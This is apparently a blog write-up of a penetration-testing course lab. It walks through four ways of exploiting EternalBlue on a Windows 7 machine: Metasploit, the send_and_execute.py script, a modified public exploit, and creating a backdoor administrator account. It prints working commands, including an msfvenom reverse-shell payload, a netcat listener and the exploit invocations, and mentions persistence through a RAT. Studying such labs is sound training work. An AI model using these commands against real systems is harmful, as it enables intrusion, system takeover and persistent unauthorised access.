In this blog we will be walking though a machine from the Cybermentors course; Practical Ethical Hacking (PEH). The main lesson from this blog post is manual exploitation of the EternalBlue vulnerability, we will walk through 3 methods of manual exploitation as well as using Metasploit.
Although this wasn't too challenging, I did learn a new way to exploit this vulnerability when modifying a public exploit which I then used in another machine which I am currently writing a blog post for.
An easy level CTF style challenge
Approx. 15 mins to complete
Target Enumeration
To start off with this machine I used a tool called NmapAuomator to speed up and automate my scans, this is a popular tool that I used in my first OSCP exam attempt. From our scan results below we see that among a number of open ports we have ports 139 and 445 open which we know to be SMB. The OS version is Windows 7 SP1 which is known to be vulnerable to MS17-010 (EternalBlue).
SMB Enumeration
To enumerate SMB further and see what shares are being shared, I used a tool called smbclient to list out the shares and connect to them. Unfortunately, there was nothing of interest for us here. We have the default shares with nothing interesting in them.
Smbclient -L \\\\192.168.100.12
Smbclient \\\\192.168.100.12\SHARE-NAME$
Exploiting EternalBlue
Method 1 Metasploit
The first and easiest method of exploitation which takes no more than 30 seconds to do, is to use Metasploit. We use the exploit 'windows/smb/ms17_010_eternalblue' and we set our rhost to the IP address of our target and we run the exploit. After a few seconds we get a meterpreter session and can drop into a shell as system.
Method 2 - Send_and_Execute.py
Our next method of manual exploitation uses a python script by helviojunior called 'Send_and_execute.py'. This exploit works by copying an executable that we specify over to the C:\> directory and executes it. I tried to run the exploit and ran into a few issues, the first of which was that I needed to freshly re-install impacket for python2.
python2 send_and_execute.py 192.168.100.12 shell.exe 443
First I used pip2 to upgrade the setuptools.
sudo pip2 install --upgrade setuptools
Then we install impacket with pip2 so we can run the python exploit.
sudo pip2 install impacket
With everything installed, we need to generate our shell code and then run our exploit using the commands below.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.73 LPORT=443 -f exe > shell.exe
python2 send_and_execute.py 192.168.100.12 shell.exe 445
We then set up our listener and catch a reverse shell as system, successfully exploiting EternalBlue.
nc -nvlp 443
Method 3 - 42315.py
The next method of exploitation uses my favourite python script for its versatility and ease of modification, it can easily be found in searchsploit with the search term 'eternalblue'. We will take exploit 42325.py and will save it to our current directory.
searchsploit -m windows/remote/42325.py
We run the exploit against our target and we see in the last two lines of the output that it executed successfully and created a file named pwned.txt in the C:\ directory. We know we have the ability to exploit this vulnerability and write to this directory, so now we can modify this exploit so that we can upload and execute a shell.
The following lines of code are responsible for creating a connection to the target, connecting to the C drive and then creating our file 'pwned.txt'.
We will modify this code so that we can send our own shell.exe to the target and add a line at the end to execute the executable.
We will use the following msfvenom command to generate our reverse shell that will be used to send to the target.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.73 LPORT=443 -f exe > shell.exe
We then execute the exploit and set our netcat listener to catch a reverse shell.
As shown below, we have now successfully caught our system level reverse shell on the machine.
Method 4 - 42315.py - Back door user
Using the same exploit previously used in method 3, we modify the code so that we can create a new user named backdoor and add them to the administrators group instead of trying to get a reverse shell.
We can confirm that our new backdoor user has been created and is in the administrators group.
In order to move laterally in a network, we could use a tool called psexec which would allow us to get a shell on a machine using credentials of a local administrator user. We explore this tool and evil-winrm further in my previous blog posts; Golden ticket attacks and Attackive directory . However in this lab set up, we do not have writable shells to be able to use this tool, instead we could modify this exploit further and add this user to the Remote Desktop Users group and RDP into the machine which we will explore in a future blog post.
Congratulations, we have walked through four different methods of manual exploitation of the EternalBlue vulnerability in Windows. From here, we have a back door user for persistence, we could gain a shell using the methods covered earlier in this blog. We would want to, if this was a domain joined machine, work our way up to Domain Admin and if not we could take this further and download and install a RAT for redundancy and another method of persistence.
I hope I explained my method clearly and provided justified reasoning for the actions I took. If you have any feedback, I would love to hear it as I want to keep improving.
Comments